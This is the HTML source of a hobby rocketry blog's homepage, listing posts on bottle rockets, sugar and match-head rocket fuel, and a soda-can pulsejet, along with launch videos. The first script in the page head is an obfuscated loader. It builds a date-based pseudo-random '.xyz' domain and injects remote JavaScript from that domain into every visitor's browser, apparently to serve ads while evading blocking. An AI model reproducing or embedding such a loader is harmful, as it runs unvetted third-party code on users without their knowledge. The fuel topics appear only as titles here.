<title>itsrocketscience.github.io</title>
<html>
<head>
  <script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
  </script>
</head>
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-GG1R3KQ46S"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-GG1R3KQ46S');
</script>
<script data-ad-client="ca-pub-9568406816158293" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script type="application/javascript">
  (function(b,o,n,g,s,r,c){if(b[s])return;b[s]={};b[s].scriptToken="XzExNTYzMzQ4NzQ";b[s].callsQueue=[];b[s].api=function(){b[s].callsQueue.push(arguments);};r=o.createElement(n);c=o.getElementsByTagName(n)[0];r.async=1;r.src=g;r.id=s+n;c.parentNode.insertBefore(r,c);})(window,document,"script","https://cdn.oribi.io/XzExNTYzMzQ4NzQ/oribi.js","ORIBI");
</script>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
* {
  box-sizing: border-box;
}

/* Add a gray background color with some padding */
body {
  font-family: Arial;
  padding: 20px;
  background: #f1f1f1;
}

/* Header/Blog Title */
.header {
  padding: 30px;
  font-size: 40px;
  text-align: center;
  background: white;
}

/* Create two unequal columns that floats next to each other */
/* Left column */
.leftcolumn {   
  float: left;
  width: 75%;
}

/* Right column */
.rightcolumn {
  float: left;
  width: 25%;
  padding-left: 20px;
}

/* Fake image */
.fakeimg {
  background-color: #aaa;
  width: 100%;
  padding: 20px;
}

/* Add a card effect for articles */
.card {
   background-color: white;
   padding: 20px;
   margin-top: 20px;
}

/* Clear floats after the columns */
.row:after {
  content: "";
  display: table;
  clear: both;
}

/* Footer */
.footer {
  padding: 20px;
  text-align: center;
  background: #ddd;
  margin-top: 20px;
}

/* Responsive layout - when the screen is less than 800px wide, make the two columns stack on top of each other instead of next to each other */
@media screen and (max-width: 800px) {
  .leftcolumn, .rightcolumn {   
    width: 100%;
    padding: 0;
  }
}
</style>
</head>
<body>

<div class="header">
  <h2>ItsRocketScience!</h2>
</div>

<div class="row">
  <div class="leftcolumn">
    <div class="card">
      <h2>DIY water bottle alcohol rocket</h2>
      <h5>Jan 20 2021 last edited</h5>
      <img src="03eb43ce-a0b3-4c16-8d6b-a60568f49da9.png" alt="picture" style="width:800px;height:300px;">
      <p>rocketry is pretty hard to get into but with a bottle and alcohol, the sky is the limit! literally...</p>
      <br>
      <p>blog post <a href="https://itsrocketscience.github.io/DIY-bottle-alcohol-rocket/">here</a></p>
    </div>
    <div class="card">
      <h2>sugar rocket fuel</h2>
      <img src="dded8e1a-c245-4eeb-8e21-e55a7d6c8ddb.png" alt="picture" style="width:800px;height:300px;">
      <p>sugary rocket fuel</p>
      <p>blog post <a href="https://itsrocketscience.github.io/DIY-sugar-rocket-fuel/">here</a></p>
    </div>
    <div class="card">
      <h2>DIY rocket fuel without KNO3</h2>
      <h5></h5>
      <img src="d957230c-2442-42aa-b6cd-1337347019d1.png" alt="picture">
      <p>this solid rocket fuel is a combo of match heads and sugar.</p>
      <br>
      <p>blog post <a href="https://itsrocketscience.github.io/No-KNO3-rocket-fuel/">here</a>
    </div>
     <div class="card">
      <h2>rocket launch #2</h2>
      <iframe width="800" height="300" src="https://www.youtube.com/embed/Crm1Rv1k1a4" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
    </div>
    <div class="card">
      <h2>rocket launch #4</h2>
      <iframe width="800" height="300" src="https://www.youtube.com/embed/59vkBsxfmMA" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
    </div>
  </div>
  <div class="rightcolumn">
    <div class="card">
      <h2>About Me</h2>
      <img src="kerbaldigitalart.jpg" alt="picture" style="width:150px;height:175px;">
      <p>i love rockets or anything that flys, arduino robots and RC toys are my hobby, blogging too!  (i'm also open for sponsorships :D)</p>
    </div>
    <div class="card">
      <h3>my youtube channel</h3>
      <script src="https://apis.google.com/js/platform.js"></script>

<div class="g-ytsubscribe" data-channelid="UCl35ICkMYAvFroYuUabSvNg" data-layout="default" data-count="default"></div>
    </div>
    <div class="card">
      <h3>my contacts</h3>
      <p>jerrbearis2cool@gmail.com</p>
      <a href="https://www.youtube.com/channel/UCl35ICkMYAvFroYuUabSvNg">contact me on YouTube</a>
    </div>
     <div class="card">
      <h2>DIY soda can pulsejet</h2>
      <h5>Jan 20 2021 last edited</h5>
      <img src="b12c31ac-4920-4583-835a-9c35ab4bea8e.png" alt="picture" style="width:300px;height:300px;">
      <p>a pulse jet? out of a SODA CAN? DO IT YOURSELF???</p>
      <br>
      <p>blog post <a href="https://itsrocketscience.github.io/diy-soda-can-pulsejet/">here</a></p>
    </div>
    <div class="card">
      <h2>rocket launch #1</h2>
      <iframe width="300" height="300" src="https://www.youtube.com/embed/WVmATAHXEeY" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
    </div>
     <div class="card">
      <h2>rocket launch #3</h2>
      <iframe width="300" height="300" src="https://www.youtube.com/embed/rJkOemZwADE" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
    </div>
  </div>
</div>

<div class="footer">
  <div class="_fa7cdd4c68507744" data-zone="0b46adf900934d4ba30e6b8e5c41185e" style="width:468px;height:60px;display: inline-block;margin: 0 auto"></div>
</div>

</body>
</html>
<html>
<link rel="shortcut icon" type="image/jpg" href="<link rel="shortcut icon" type="image/jpg" href="images/kerbaldigitalart.jpg"/>"/>
</html>
